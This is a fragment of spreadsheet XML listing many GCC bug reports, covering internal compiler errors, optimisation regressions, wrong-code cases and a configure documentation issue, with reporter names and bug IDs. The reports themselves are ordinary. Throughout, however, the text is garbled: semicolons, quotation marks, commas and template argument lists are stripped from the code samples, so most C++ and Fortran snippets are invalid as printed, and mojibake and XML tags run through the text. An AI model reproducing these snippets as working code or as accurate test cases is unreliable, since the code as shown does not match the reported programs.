The attached testcase fails causes a gcc ICE when building for gnuspe targets where -mfloat-gprs=double is used -mfloat-gprs=single works fine
$ ./gcc/cc1 ~/a.c -mfloat-gprs=double
__bswap_32 __bswap_64 atoi atol atoll gnu_dev_major gnu_dev_minor gnu_dev_makedev __libc_use_alloca atof stat lstat fstat fstatat mknod mknodat stat64 lstat64 fstat64 fstatat64 __stat __mknod btowc wctob mbrlen __sigismember __sigaddset __sigdelset pthread_equal __cmsg_nxthdr __ctype_b_loc __ctype_toupper_loc __ctype_tolower_loc tolower toupper __strcspn_c1 __strcspn_c2 __strcspn_c3 __strspn_c1 __strspn_c2 __strspn_c3 __strpbrk_c2 __strpbrk_c3 __strtok_r_1c __strsep_1c __strsep_2c __strsep_3c get_rounding_mode round_away __mpn_add_1 __mpn_add __mpn_sub_1 __mpn_sub overflow_value underflow_value round_and_return str_to_mpn __mpn_lshift_1 ____strtold_l_internal ____new_strtold_l ldbl_extract_mantissa ldbl_insert_mantissa ldbl_pack ldbl_unpack ldbl_canonicalize ldbl_nearbyint __copysign __copysignf __copysignl default_libc_feholdexcept default_libc_fesetround default_libc_feholdexcept_setround default_libc_fesetenv default_libc_feupdateenv default_libc_feupdateenv_test
Analyzing compilation unit
 {GC 5330k -&gt; 3381k}Performing interprocedural optimizations
      Assembling functions:
 get_rounding_mode round_away overflow_value underflow_value round_and_return str_to_mpn {GC 5341k -&gt; 4033k} ____strtold_l_internal
In file included from ../sysdeps/ieee754/ldbl-128ibm/strtold_l.c:54:0:
./strtod_l.c: In function '____strtold_l_internal':
./strtod_l.c:1778:1: error: unrecognizable insn:
(insn 6071 6070 1650 234 (set (reg:TI 4 4)
        (mem/c:TI (plus:SI (reg:SI 5 5)
                (const_int 2032 [0x7f0])) [0 %sfp+2032 S16 A128])) ./strtod_l.c:1002 -1
     (nil))
./strtod_l.c:1778:1: internal compiler error: in extract_insn at recog.c:2158
0x7ec4c5 _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../gcc/gcc/rtl-error.c:109
0x7ec4f9 _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../gcc/gcc/rtl-error.c:117
0x7bf4c3 extract_insn(rtx_def*)
        ../../gcc/gcc/recog.c:2158
0x7bf534 extract_insn_cached(rtx_def*)
        ../../gcc/gcc/recog.c:2061
0x61f0a6 cleanup_subreg_operands(rtx_def*)
        ../../gcc/gcc/final.c:2998
0x7eb7b6 reload(rtx_def* int)
        ../../gcc/gcc/reload1.c:1240
0x70637b do_reload
        ../../gcc/gcc/ira.c:4701
0x70637b rest_of_handle_reload
        ../../gcc/gcc/ira.c:4801
This has been seen on trunk and 4.8 branch works ok on 4.7 and below</t>
  </si>
  <si>
    <t>raj.khem</t>
  </si>
  <si>
    <t>GCC-4696</t>
  </si>
  <si>
    <t>Casting operator creates bogus temporary</t>
  </si>
  <si>
    <t>gcc 3.0 and 3.0.2 attempt to produce an unnecessary copy when using
a casting operator.  gcc 2.95 did not have this problem and other
C++ compilers accept this code.
Here is a simple example:
class A {
public:
  A() {}
private:
  A(const A
}
class B : public A {
public:
  B() {}
private:
  B(const B
}
class C {
  B b
public:
  operator B}
}
void foo1(const B&amp; b)
{
}
void foo2(const A&amp; a)
{
}
main()
{
  A a
  foo2(a) // Good
  B b
  foo1(b) // Good
  foo2(b) // Good
  C c
  foo1(c) // Good
  foo2(c) // Bad: gcc complains about private copy ctor in B
  foo2(static_cast&lt;B // Workaround
}
The line marked Bad: complains on gcc 3.0.* that the copy
ctor for B is private which is true.  However the copy ctor
for B should never be needed - a temporary object is not needed
in this case.
This code compiles under gcc 2.9x SGI MIPSpro 7.3.1.1m and
Compaq C++ V6.3-008.
Release:
3.0.2
Environment:
System: Linux ufo.cs.utah.edu 2.4.8-pre3-xfs #22 Thu Oct 18 14:10:22 MDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.2/configure --prefix=/usr --enable-languages=c++f77
How-To-Repeat:
   g++ -o t t.cc</t>
  </si>
  <si>
    <t>sparker</t>
  </si>
  <si>
    <t>GCC-67098</t>
  </si>
  <si>
    <t>Documentation --with-stage1-ldflags does not mention default -static-libstdc++ -static-libgcc</t>
  </si>
  <si>
    <t>https://gcc.gnu.org/install/configure.html:
...
--with-stage1-ldflags=flags
    This option may be used to set linker flags to be used when linking stage 1 of GCC. These are also used when linking GCC if configured with --disable-bootstrap. By default no special flags are used. 
...
But in configure we have:
...
# Linker flags to use for stage1 or when not bootstrapping.
# Check whether --with-stage1-ldflags was given.
if test ${with_stage1_ldflags+set} = set then :
  withval=$with_stage1_ldflags if test $withval = no -o $withval = yes then
   stage1_ldflags=
 else
   stage1_ldflags=$withval
 fi
else
  stage1_ldflags=
 # In stage 1 default to linking libstdc++ and libgcc statically with GCC
 # if supported.  But if the user explicitly specified the libraries to use
 # trust that they are doing what they want.
 if test $stage1_libs =  -a $have_static_libs = yes then
   stage1_ldflags=-static-libstdc++ -static-libgcc
 fi
fi
...
So the doc should be something like:
...
--with-stage1-ldflags=flags
    This option may be used to set linker flags to be used when linking stage 1 of GCC. These are also used when linking GCC if configured with --disable-bootstrap.  If neither â€“with-stage1-libs nor â€“with-host-libstdcxx is set to a value then the default is â€˜-static-libstdc++ -static-libgccâ€™ if supported.
...</t>
  </si>
  <si>
    <t>GCC-11353</t>
  </si>
  <si>
    <t>Still problems with namespaces</t>
  </si>
  <si>
    <t>First: support for namespaces has become much much better many thanks
for that!
Second: something is still going wrong though I don't know whether it's
in gcc or in gdb. Here's a small example:
----------------------------------
struct X {
    virtual int f() { return 1 }
}
namespace A {
  struct X {
      virtual int f() { return 2}
  }
}
void stop_gdb() {}
int main () {
  X    x
  A::X a_x
  stop_gdb()
}
------------------------------
Compiled with a recent CSV snapshot of gcc (2003-05-20) then going
into gdb yields this:
tmp/gg&gt; c++ -ggdb x.cc
tmp/gg&gt; gdb a.out
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003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386-redhat-linux-gnu...
(gdb) b main
Breakpoint 1 at 0x80485c6: file x.cc line 14.
(gdb) r
Starting program: /homes/csm2/bangerth/tmp/gg/a.out
Breakpoint 1 main () at x.cc:14
14        X    x
(gdb) n
15        A::X a_x
(gdb)
16        stop_gdb()
(gdb) p x.f()
$1 = 1
(gdb) p a_x.f()
warning: can't find class named `A::X' as given by C++ RTTI
$2 = 2
Note that the result returned is quite right. It's just the warning that's
confusing me and in particular that no similar warning is given for ::X.
Maybe someone can make sense out of this.
Thanks
  W.</t>
  </si>
  <si>
    <t>bangerth</t>
  </si>
  <si>
    <t>GCC-835</t>
  </si>
  <si>
    <t>overloaded functions</t>
  </si>
  <si>
    <t>Legal redeclaration of a (possibly extern) overloaded 
function inside a method triggers an ICE in pushdecl at 
cp/decl.c:3855.
This makes it currently impossible to compile Bruno Haible's
CLN library.
Release:
gcc version 2.97 20001113 (experimental) and some prior snapshots
How-To-Repeat:
Just run the attached little program snippet:
baryon:/temp/src$ c++ -c bug17.cc
bug17.cc: In constructor `bar::bar(const char*)':
bug17.cc:15: Tree check: expected class 'd' have 'x' (overload)
bug17.cc:15: Internal compiler error in pushdecl at cp/decl.c:3855
   Please submit a full bug report.
   See  for instructions.</t>
  </si>
  <si>
    <t>richard.kreckel</t>
  </si>
  <si>
    <t>GCC-635</t>
  </si>
  <si>
    <t>initializers for static const variables in templates not called</t>
  </si>
  <si>
    <t>g++ ignores the initialization for a static variable
inside a template if it is a const
Output from the program (attached) should be :
inside Bar::setFlag
inside TFoo1::setFlag
inside TFoo2::setFlag
instead output from g++ compiled version is:
inside Bar::setFlag
inside TFoo2::setFlag
Release:
2.95.2 19991024 (release)
Environment:
rs6000-ibm-aix4.3.3.0
How-To-Repeat:
#include 
template struct TFoo1 {
  static bool setFlag() {
    cout::setFlag&lt;&lt;endl
    return false
  }
  static const bool flag
}
template struct TFoo2 {
  static bool setFlag() {
    cout::setFlag&lt;&lt;endl
    return false
  }
  static bool flag
}
struct Bar {
  static bool setFlag() {
    cout&lt;&lt;inside Bar::setFlag&lt;&lt;endl
    return false
  }
  static const bool flag
}
// static variables init
template const bool TFoo1::flag(setFlag())
const bool Bar::flag(Bar::setFlag())
template bool TFoo2::flag(setFlag())
int
main() {
  // force instance
  TFoo1 a cout&lt;&lt;a.flag
  TFoo2 b cout&lt;&lt;b.flag
}</t>
  </si>
  <si>
    <t>narayansl</t>
  </si>
  <si>
    <t>GCC-53440</t>
  </si>
  <si>
    <t>[arm] generic thunk code fails for method which uses '...'</t>
  </si>
  <si>
    <t>This is a target bug but it's related to bug 7618 (which was mips specific). I'm opening a new PR for arm-gnueabi as it is a primary target
$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: arm-unknown-linux-gnueabi
Configured with: ../configure --target=arm-unknown-linux-gnueabi --prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi --with-sysroot=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi//sys-root --disable-multilib --with-local-prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-c99 --enable-long-long --enable-target-optspace target_alias=arm-unknown-linux-gnueabi --enable-languages=c++ --disable-shared --disable-libmudflap --disable-libssp --enable-checking
Thread model: posix
gcc version 4.8.0 20120521 (experimental) [trunk revision 187727] (GCC) 
$ ./xgcc -B. ~/t.cc
/home/ryan/t.cc:18:1: error: generic thunk code fails for method 'virtual void Test::Log(const char* ...)' which uses '...'
 }}
 ^</t>
  </si>
  <si>
    <t>rmansfield</t>
  </si>
  <si>
    <t>GCC-13746</t>
  </si>
  <si>
    <t>internal compiler error during compile</t>
  </si>
  <si>
    <t>GNU F77 version 3.3.1 (cygming special) (i686-pc-cygwin)
        compiled by GNU C version 3.3.1 (cygming special).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=130989
extract.f: In subroutine `aswfb':
extract.f:47: internal compiler error: in emit_swap_insn at reg-stack.c:987</t>
  </si>
  <si>
    <t>oliphant.travis</t>
  </si>
  <si>
    <t>GCC-54638</t>
  </si>
  <si>
    <t>[4.8 Regression] bootstraping 4.7.2 with 4.8 broken: cc1: malloc(): memory corruption</t>
  </si>
  <si>
    <t>With:
~/gcc/configure --disable-werror --disable-multilib --enable-checking=release --enable-languages=cc++
and:
make BOOT_CFLAGS=-march=native -O2 -pipe STAGE1_CFLAGS=-march=native -O2 -pipe CFLAGS_FOR_TARGET=-march=native -O2 -pipe CXXFLAGS_FOR_TARGET=-march=native -O2 -pipe bootstrap
I get:
...
/var/tmp/gcc_build_dir/./gcc/xgcc -B/var/tmp/gcc_build_dir/./gcc/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/x86_64-unknown-linux-gnu/include -isystem /usr/local/x86_64-unknown-linux-gnu/sys-include    -march=native -O2 -pipe -O2  -march=native -O2 -pipe -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fpic -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fpic -I. -I. -I../.././gcc -I/home/markus/gcc/libgcc -I/home/markus/gcc/libgcc/. -I/home/markus/gcc/libgcc/../gcc -I/home/markus/gcc/libgcc/../include -I/home/markus/gcc/libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS  -DUSE_TLS -o _cmpdi2.o -MT _cmpdi2.o -MD -MP -MF _cmpdi2.dep -DL_cmpdi2 -c /home/markus/gcc/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
*** glibc detected *** /var/tmp/gcc_build_dir/./gcc/cc1: malloc(): memory corruption: 0x00000000014e8e10 ***
That happens with r191468 of trunk.</t>
  </si>
  <si>
    <t>GCC-30095</t>
  </si>
  <si>
    <t>ICE in lhd_set_decl_assembler_name at langhooks.c:165 with -O0</t>
  </si>
  <si>
    <t>Hi
the attached Fortran code ICE's at -Os -O2 and -O3
but compiles at -O0 and -O1.
% gfortran -c gfcbug47.f90 -Os
gfcbug47.f90: In function 'foo':
gfcbug47.f90:6: internal compiler error: in lhd_set_decl_assembler_name at lang
hooks.c:165
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-49092</t>
  </si>
  <si>
    <t>[4.7 Regression] ice in tree_add_const_value_attribute</t>
  </si>
  <si>
    <t>Created attachment 24310
C++ source code
I just tried to compile the package ClanLib1 with the latest 4.7 snapshot
20110514 on a Fedora Linux x86_64 box.
The compiler said
inputdialog_generic.cpp:298:1: internal compiler error: in tree_add_const_value_attribute at dwarf2out.c:17686
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -g required.</t>
  </si>
  <si>
    <t>GCC-8610</t>
  </si>
  <si>
    <t>large file support in libstdc++-v3 (std::streamoff type  is 32-bit  in GCC 3.2 whereas it was 64-bit in GCC 2.96)</t>
  </si>
  <si>
    <t>Large file support under the std namespace appears to be broken for my version of the gcc 3.2 compiler (files larger than 2 GB can't be written using std::fstream).  I think this may be because of a change in the types used for std::streamoff and std::streampos.
In gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-98)
sizeof(std::streamoff) = 8 bytes (64 bits)
sizeof(std::streampos) = 8 bytes (64 bits)
This seems reasonable.
In gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
sizeof(std::streamoff) = 4 bytes (32 bits)
sizeof(std::streampos) = 12 bytes (96 bits)
This looks like it might be a bug because 96-bit file offsets are very large but (signed) 32-bit offsets limit files to 2 GB.
Release:
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
Environment:
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
How-To-Repeat:
The attached file contains a tar.gz of the *.ii files from both versions of the gcc compiler for the following source code.
#include 
#include 
using namespace std
int main(void)
{
        cout &lt;&lt; sizeof(std::streamoff) =  &lt;&lt; sizeof(std::streamoff) &lt;&lt;  bytes ( &lt;&lt; (sizeof(std::streamoff) * 8) &lt;&lt;  bits) &lt;&lt; endl
        cout &lt;&lt; sizeof(std::streampos) =  &lt;&lt; sizeof(std::streampos) &lt;&lt;  bytes ( &lt;&lt; (sizeof(std::streampos) * 8) &lt;&lt;  bits) &lt;&lt; endl
        return 0
}</t>
  </si>
  <si>
    <t>davido</t>
  </si>
  <si>
    <t>GCC-44810</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: g++.dg/torture/pr36745.C</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/test/gnu/
gcc/objdir/gcc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/tortu
re/pr36745.C  -nostdinc++ -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v
3/include/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc
++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/lib
stdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmes
sage-length=0  -O0  -O2 -fPIC  -S  -o pr36745.s    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/torture/pr36745.C: In member function 'vo
id QRegExpEngine::addCatTransitions()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/torture/pr36745.C:20:35: error: output nu
mber 0 not directly addressable
compiler exited with status 1
output is:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/torture/pr36745.C: In member function 'vo
id QRegExpEngine::addCatTransitions()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/torture/pr36745.C:20:35: error: output nu
mber 0 not directly addressable
FAIL: g++.dg/torture/pr36745.C  -O0  (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/torture/pr36745.C:20:35: error: output nu
mber 0 not directly addressable</t>
  </si>
  <si>
    <t>GCC-18525</t>
  </si>
  <si>
    <t>ICE on valid code in gfc_get_symbol_decl()</t>
  </si>
  <si>
    <t>The following testcase causes an ICE in the current gfortran. 
The code seems ill-formed to me because the name n 
was already defined as a constant in the module scope 
but I'm not sure. 
This was originally reported by Vivek Rao (vivekrao4@yahoo.com). 
module zz 
integer parameter :: n=2 ! causes ICE 
contains 
subroutine xx(n) 
call yy(n) 
end subroutine xx 
end module zz 
~/tmp&gt;gfortran -v -c bug.f90 
Reading specs 
from /afs/mpa/data/martin/ugcc/lib/gcc/i686-pc-linux-gnu/4.0.0/specs 
Configured with: /scratch/gcc/configure --quiet 
--prefix=/afs/mpa/data/martin/ugcc --enable-languages=c++f95 
--with-gmp=/afs/mpa/data/martin/mygmp 
Thread model: posix 
gcc version 4.0.0 20041117 (experimental) 
 /afs/mpa/data/martin/ugcc/libexec/gcc/i686-pc-linux-gnu/4.0.0/f951 bug.f90 
-quiet -dumpbase bug.f90 -mtune=pentiumpro -auxbase bug -version 
-o /tmp/ccVLWgWD.s 
GNU F95 version 4.0.0 20041117 (experimental) (i686-pc-linux-gnu) 
        compiled by GNU C version 4.0.0 20041117 (experimental). 
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096 
bug.f90: In function 'xx': 
bug.f90:4: internal compiler error: in gfc_get_symbol_decl at 
fortran/trans-decl.c:704 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions.</t>
  </si>
  <si>
    <t>tobi</t>
  </si>
  <si>
    <t>GCC-83116</t>
  </si>
  <si>
    <t>[6 Regression] Statement with no effect causes wrong code of static object constexpr method</t>
  </si>
  <si>
    <t>Created attachment 42685
Preprocessed source
Following testcase:
$ cat main.cpp 
#include 
struct foo {
    constexpr foo() : size_(0) {
        (void)size()
    }
    constexpr int size() {
        return size_
    }
    int size_
}
int main() {
    static foo var
    var.size_ = 5
    std::printf(%d %d var.size_ var.size())
    return 0
}
$ g++ -Wall -Wextra -pedantic -O0 main.cpp -o main &amp;&amp; ./main
5 5
$ g++ -Wall -Wextra -pedantic -O1 main.cpp -o main &amp;&amp; ./main
5 0
(Same happens on -Og -O2 and -O3)
Tested on:
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /build/gcc/src/gcc/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --disable-multilib --disable-werror --enable-checking=release --enable-default-pie --enable-default-ssp
Thread model: posix
gcc version 7.2.0 (GCC)
Correct behavior is seen using gcc-5.4 clang and msvc.
Removing constructor body gives correct code - this is stripped version originally there was assert(this-&gt;size() &gt;= 0)
UBSAN gives no results.
This bug occurs also on 6.1.0 6.2.0 6.3.0 7.1.0 7.2.0 and today's trunk (8.0.0 20171122) as tested on compiler explorer: https://godbolt.org/g/hr4Nq4</t>
  </si>
  <si>
    <t>GCC-39969</t>
  </si>
  <si>
    <t>[4.5 Regression] Revision 146831 caused many test failures on Linux/ia64</t>
  </si>
  <si>
    <t>Revision 146831 caused the following test failures on Linux/ia64:
FAIL: gcc.c-torture/execute/20050604-1.c compilation  -O1  (internal compiler error)
FAIL: gcc.c-torture/execute/20050604-1.c compilation  -O2  (internal compiler error)
FAIL: gcc.c-torture/execute/20050604-1.c compilation  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (internal compiler error)
FAIL: gcc.c-torture/execute/20050604-1.c compilation  -O3 -fomit-frame-pointer -funroll-loops  (internal compiler error)
FAIL: gcc.c-torture/execute/20050604-1.c compilation  -O3 -fomit-frame-pointer  (internal compiler error)
FAIL: gcc.c-torture/execute/20050604-1.c compilation  -O3 -g  (internal compiler error)
FAIL: gcc.c-torture/execute/20050604-1.c compilation  -Os  (internal compiler error)
FAIL: gcc.dg/pr32912-2.c (internal compiler error)
FAIL: gcc.dg/pr32912-2.c (test for excess errors)
FAIL: gcc.dg/pr32912-3.c (internal compiler error)
FAIL: gcc.dg/pr32912-3.c scan-tree-dump-not optimized ~{: dump file does not exist
FAIL: gcc.dg/pr32912-3.c (test for excess errors)
FAIL: gcc.dg/torture/pr21817-1.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/pr21817-1.c  -O1  (test for excess errors)
FAIL: gcc.dg/torture/pr21817-1.c  -O2  (internal compiler error)
FAIL: gcc.dg/torture/pr21817-1.c  -O2  (test for excess errors)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (internal compiler error)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -fomit-frame-pointer -funroll-loops  (internal compiler error)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -fomit-frame-pointer  (internal compiler error)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -g  (internal compiler error)
FAIL: gcc.dg/torture/pr21817-1.c  -O3 -g  (test for excess errors)
FAIL: gcc.dg/torture/pr21817-1.c  -Os  (internal compiler error)
FAIL: gcc.dg/torture/pr21817-1.c  -Os  (test for excess errors)
They aren't fixed as of revision 146941.</t>
  </si>
  <si>
    <t>GCC-11329</t>
  </si>
  <si>
    <t>Compiler cannot find user defined implicit typecast</t>
  </si>
  <si>
    <t>GCC 3.3 does not find the user defined typcast in the appended code. In gcc 2.95.3 
and Borland C++ 6 it does work. 
Compiling with g++ bugsim2.cc failes with: 
***** 
bugsim2.cc: In function `int main()': 
bugsim2.cc:27: error: could not convert `super' to `Base&amp;' 
bugsim2.cc:21: error: in passing argument 1 of `void funcNonConst(Base&amp; 
   Derived&amp; const Base*)' 
***** 
gcc -v: 
bugsim2.cc: In function `int main()': 
bugsim2.cc:27: error: could not convert `super' to `Base&amp;' 
bugsim2.cc:21: error: in passing argument 1 of `void funcNonConst(Base&amp; 
   Derived&amp; const Base*)' 
uname -a: 
Linux earth 2.4.20-4GB #1 Wed Jun 18 07:45:45 UTC 2003 i686 unknown unknown 
GNU/Linux 
Standard SuSE 8.2 on Pentium 4. 
****************************** 
class Base { 
} 
class Derived: public Base { 
} 
class Super { 
public: 
  Derived *derived 
  Super(): derived(new Derived) {} 
  ~Super() { delete derived } 
  Base *pointer() const { return derived } 
  operator Base  } 
  operator Derived  } 
} 
void funcNonConst(Base &amp;base Derived &amp;derived const Base *orig) 
{ 
} 
int main() 
{ 
  Super super 
  funcNonConst(super super super.pointer()) 
}</t>
  </si>
  <si>
    <t>GCC-65790</t>
  </si>
  <si>
    <t>compilation error : receive std::index_sequence</t>
  </si>
  <si>
    <t>Compilation error follow code:
#include 
#include 
void g(std::size_t a std::size_t b std::size_t c)
{
  std::cout &lt;&lt; a &lt;&lt;   &lt;&lt; b &lt;&lt;   &lt;&lt; c &lt;&lt; std::endl
}
//template 
//void f(std::integer_sequence) // OK
template 
void f(std::index_sequence) // NG
{
  g(Seq...)
}
int main()
{
  f(std::index_sequence())
}
error message:
prog.cc: In function 'void f(std::index_sequence)':
prog.cc:14:11: error: too few arguments to function 'void g(std::size_t std::size_t std::size_t)'
   g(Seq...)
           ^
prog.cc:4:6: note: declared here
 void g(std::size_t a std::size_t b std::size_t c)
      ^
I think this is compiler's issue not libstdc++.</t>
  </si>
  <si>
    <t>faithandbrave</t>
  </si>
  <si>
    <t>GCC-28624</t>
  </si>
  <si>
    <t>[4.2 regression] latent segfault in remove_phi_node</t>
  </si>
  <si>
    <t>I got a segfault with a recent version of gcc 4.2 on x86_64.  It has gone away recently but after investigating when it was introduced and fixed I got the impression that this is a latent problem.
With the attached testcase I can reproduce this segfault starting with r115200 until r115711.  As far as I can tell neither of those changes are related so I think the problem is latent.
(sid)585:tbm@usurper: ~] /usr/lib/gcc-snapshot/bin/g++ -c -O2 fityk-ast.ii
/usr/include/boost/spirit/core/impl/parser.ipp: In function 'boost::spirit::parse_info boost::spirit::parse(const CharT* const boost::spirit::parser&amp;) [with CharT = char DerivedT = boost::spirit::sequence boost::spirit::contiguous boost::spirit::action boost::spirit::ref_value_actor &gt; &gt; &gt; &gt;]':
/usr/include/boost/spirit/core/impl/parser.ipp:40: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
zsh: exit 1     /usr/lib/gcc-snapshot/bin/g++ -c -O2 fityk-ast.ii
(sid)586:tbm@usurper: ~] /usr/lib/gcc-snapshot/bin/g++ -c -O1 fityk-ast.ii
(sid)587:tbm@usurper: ~]</t>
  </si>
  <si>
    <t>tbm</t>
  </si>
  <si>
    <t>GCC-67710</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/darwin-*version-*.c (test for excess errors) with Xcode 7</t>
  </si>
  <si>
    <t>The following tests are failing with Xcode 7
FAIL: gcc.dg/darwin-minversion-1.c (test for excess errors)
FAIL: gcc.dg/darwin-minversion-2.c (test for excess errors)
FAIL: gcc.dg/darwin-version-1.c (test for excess errors)
The errors are of the kind
[Book15] f90/bug% gcc /opt/gcc/_clean/gcc/testsuite/gcc.dg/darwin-version-1.c -mmacosx-version-min=10.1
ld: warning: object file (/var/folders/8q/sh_swgz96r7f5vnn08f7fxr00000gn/T//ccqKLLOU.o) was built for newer OSX version (10.10) than being linked (10.4)</t>
  </si>
  <si>
    <t>GCC-81188</t>
  </si>
  <si>
    <t>[7/8 Regression] decltype(this-&gt;member()) raises invalid prototype</t>
  </si>
  <si>
    <t>Compiling the following test case
```
template 
struct C {
  F fast(long i) const
  auto operator[](long i) const -&gt; decltype(this-&gt;fast(i))
}
template 
auto C::operator[](long i) const -&gt; decltype(this-&gt;fast(i)) {
  return fast(i)
}
```
with
```
g++ -std=c++11 -c a.cpp
```
raises the following unexpected error message
```
a.cpp:8:6: error: prototype for â€˜decltype (((const C*)this)-&gt;C::fast(i)) C::operator[](long int) constâ€™ does not match any in class â€˜Câ€™
 auto C::operator[](long i) const -&gt; decltype(this-&gt;fast(i)) {
      ^~~~
a.cpp:4:8: error: candidate is: decltype (((const C*)this)-&gt;C::fast(i)) C::operator[](long int) const
   auto operator[](long i) const -&gt; decltype(this-&gt;fast(i))
```
Removing the ``this-&gt;`` in the decltype fixes the issue but this is a regression compared to g++-6 and clang++.</t>
  </si>
  <si>
    <t>serge.guelton</t>
  </si>
  <si>
    <t>GCC-59624</t>
  </si>
  <si>
    <t>bizarre warning about 'assigned but unused parameter' in ctor</t>
  </si>
  <si>
    <t>Created attachment 31538
SSCCE showing the bug
Consider the following code:
// foo is a class rc is an enum class
foo::foo(rc c) : v{static_cast(c)} {}
g++ with -std=c++11 -Wall -Wextra warns:
foo.cpp:8:3: warning: parameter â€˜câ€™ set but not used [-Wunused-but-set-parameter]
...but there is no assignment occurring?!
I suspect under the covers this is due to C++ DR1288 (i.e. see bug #50025 of which this is possibly either a duplicate or just goes away if that is fixed but will let someone else make that call) but for otherwise-warning-free code it's quite obnoxious as there does not appear to be anything wrong with the code.
Goes away if ()'s are used instead of {}'s for the initialization.
(Full SSCCE is attached.)</t>
  </si>
  <si>
    <t>mw_triad</t>
  </si>
  <si>
    <t>GCC-59260</t>
  </si>
  <si>
    <t>[4.9 Regression] fold-const.c:14871:5: error: 'hash_table' has not been declared</t>
  </si>
  <si>
    <t>trunk r205300 Fedora19/x86_64 configured as
~/src/gcc_current/configure --prefix=/usr/local/gcc_current --with-multilib-list=m64 --enable-checking=fold --enable-languages=cc++lto --enable-plugin --with-tune=native --with-arch=native --enable-version-specific-runtime-libs
err triggered by --enable-checking=fold and looks as
make[3]: Entering directory `/home/dimhen/build/gcc_current_fold/gcc'
